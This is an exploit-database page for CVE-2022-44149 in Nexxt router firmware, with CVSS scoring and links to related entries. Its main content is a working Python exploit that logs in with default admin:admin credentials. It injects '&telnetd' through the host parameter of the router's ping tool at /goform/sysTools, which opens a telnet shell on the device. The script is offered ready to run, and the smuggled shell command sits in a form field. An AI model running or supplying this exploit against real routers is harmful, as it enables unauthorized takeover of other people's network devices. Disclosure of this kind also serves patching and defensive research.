Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtYerodin Richards1337DAY-ID-38137
HistoryJan 04, 2023 - 12:00 a.m.

Nexxt Router Firmware 42.103.1.5095 Remote Code Execution Exploit

2023-01-0400:00:00
Yerodin Richards
0day.today
244
nexxt router
remote code execution
authenticated
cve-2022-44149
vendor homepage
version 42.103.1.5095
tested on arn02304u8
http request
telnet command

CVSS3

8.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

AI Score

8.9

Confidence

High

EPSS

0.038

Percentile

92.1%

JSON
# Exploit Title: Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://www.nexxtsolutions.com/
# Version: 42.103.1.5095
# Tested on: ARN02304U8
# CVE : CVE-2022-44149

import requests
import base64

router_host = "http://192.168.1.1"
username = "admin"
password = "admin"


def main():
    send_payload("&telnetd")
    print("connect to router using: `telnet "+router_host.split("//")[1]+ "` using known credentials")
    pass

def gen_header(u, p):
    return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")

def send_payload(payload):
    url = router_host+"/goform/sysTools"
    headers = {"Authorization": "Basic {}".format(gen_header(username, password))}
    params = {"tool":"0", "pingCount":"4", "host": payload, "sumbit": "OK"}
    requests.post(url, headers=headers, data=params)


if __name__ == '__main__':
    main()

Related

prion 1
zdt 1
exploitdb 1
packetstorm 1
cvelist 1
nvd 1
cve 1
prion
prion
Authentication flaw
2023-01-06 17:15:00
zdt
zdt
Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (Authenticated) Exploit
2023-04-02 00:00:00
exploitdb
exploitdb
Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated)
2023-04-01 00:00:00
packetstorm
packetstorm
Nexxt Router Firmware 42.103.1.5095 Remote Code Execution
2023-01-04 00:00:00
cvelist
cvelist
CVE-2022-44149
2023-01-06 00:00:00
nvd
nvd
CVE-2022-44149
2023-01-06 17:15:09
cve
cve
CVE-2022-44149
2023-01-06 17:15:09

CVSS3

8.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

AI Score

8.9

Confidence

High

EPSS

0.038

Percentile

92.1%

JSON
Related for 1337DAY-ID-38137
prion1zdt1exploitdb1packetstorm1cvelist1nvd1cve1